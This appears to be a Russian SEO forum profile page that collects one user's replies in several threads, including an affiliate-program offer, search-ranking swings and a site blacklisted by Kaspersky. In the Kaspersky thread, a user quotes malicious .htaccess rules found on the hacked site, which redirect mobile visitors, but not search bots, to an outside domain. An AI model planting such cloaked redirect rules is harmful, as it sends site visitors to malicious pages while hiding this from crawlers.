Klopopryg

Klopopryg
Рейтинг
359
Регистрация
29.12.2004
Должность
SEO
Рекламирую и оптимизирую сайты
Tamata:
Рады предложить новую партнерскую программу продажи мебели с очень привлекательными условиями!

Привлекайте потенциальных покупателей и получайте прибыль с каждого успешного заказа.
Кроме того, каждый партнер получает 10% с заработка привлеченного реферала и 2% с заработка реферала второго уровня.
Выберайте нишу в мебели и начните зарабатывать вместе с нами уже сейчас!
Условия партнерской программы действительно уникальные!
Каждый партнер может установить дополнительную персональную наценку на товар (максимально 5%) и получать до 12% от стоимости заказа).
Базовая ставка партнера составляет 4%, без учета его дополнительной наценки (максимально 5%)
Учитывая, что мебель - удовольствие не из дешевых, средний заказ составляет около 8 500 руб., а максимальные суммы заказа розничных покупателей достигают до нескольких десятков тысяч рублей, а оптовых - до сотней тысяч рублей.

Какой-т у вас очень дешевый "средний заказ", настораживает очень.

Трубадур:
24 апреля ВЧ ВК как многие упал -500.
Качало от 500 позиции до 280. Последние несколько дней смотрю ситуация такая: 20.10 - 270 место, 21.10 - 260 место и так далее каждый день +10 позиций.

Может отпускает? Что делать в такой ситуации, может кто подсткажет...

Если посмотреть на выдачу, то станет ясно - гугл настраивает новый алгоритм, то наращивает одни факторы, то другие. Из-за этого качает ВСЮ выдачу. Поэтому ваши +10 ни о чем не говорят.

Вот если было бы 15 позиция и +10, да, тогда интересно, а когда 260 позиция и +10... то по такой позиции на ваш сайт лишь парсер придет!

Dwarfik:

Ни один кот не смог сделать выход на две лапы... слабаки, вот так нада, тренеруйтесь:



---------- Добавлено 26.10.2012 в 01:12 ----------

alaev:
Тарифный план "десяточка" :D

Видео хорошее, озвучка не та. Правильный текст такой:

Ребят, поймите меня правильно, пили мы с пятницы....уффф... плохо мне... говорить тяжело... шнур какой-то из уха торчить... мешает... так вот.. о чем я... были деньги, мама дала на завтраки, не знаю куда делись... видимо пока спал, воры украли.

Сейчас плохо мне....уф... правда плохо, видно же... короче, надо мне помочь, денег дать... без пива голова совсем трещит.

Помогите мне.. материально...ффуххх... я планирую дальше бухать, но без бабла, это сложно, сами понимаете... здоровье у меня не то, чтобы всякую дрянь пить...

Короче... из-за великой нужды придумал я план... десяточка, суть его вот в чем: если собрать 5-6 лохов, которые будут башлять по десятке ежемесячно, то смогу год пить - точно!

Вот в принципе и все... ик....

trahtor:
У меня сосед - вампир. Что делать?

У меня сосед татарин, я ничего не делаю.

Тебе он что мешает?

Отлично, всем огромное спасибо!

Ответ от касперского:

Сайт удален из черного списка.

Посмотрите у кого стоит каспеский, все нормально теперь?

WebAlt:
Kaspersky CRYSTAL 2.0 не пускает.
Дык сайт уже попал в базу вредоносных адресов, для удаления из неё вам походу нужно сделать запрос на исследование веб-ресурса или на ложное срабатывание сайта:
http://support.kaspersky.ru/virlab/helpdesk.html

Пишу туда, полное молчание, видимо нужно, чтобы написал тот, у кого есть данный антивирус. А то даже регистрация на сайте не помогает. Создаю "вопрос" (уже 2 раза), отправляю, а он не появляется. В личном кабинете пишет "0" созданных запросов.

Ayavryk:
Проверьте .htaccess самые последние строчки

прямо в точку

вот что там было

RewriteEngine   on

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://httpupdate.com/u/1633 [L,R=302]

Пасиба огромное.

Еще раз просьба те, у кого есть Касперский, посмотрите, теперь ругается?

antena:
Начала правда всплывать

ага... только по русски:

клиентов торгового центра охранники приглашали в свою комнату под предлогом подозрения в краже из магазина. Уже там в служебном помещении на них давили морально, угрожая милицией и тюрьмой, а также требовали с людей от 1000 до 8000 отступных.

Ну тогда тем более... горе бандиты

wrangray:
а мы тут раскудахтались про профессионализм и навыки - они вон оказывается по штату менеджеры вообще

С каких пор тогда в обязанности манагера входит задерживать людей? Для этого есть охрана.

Всего: 9506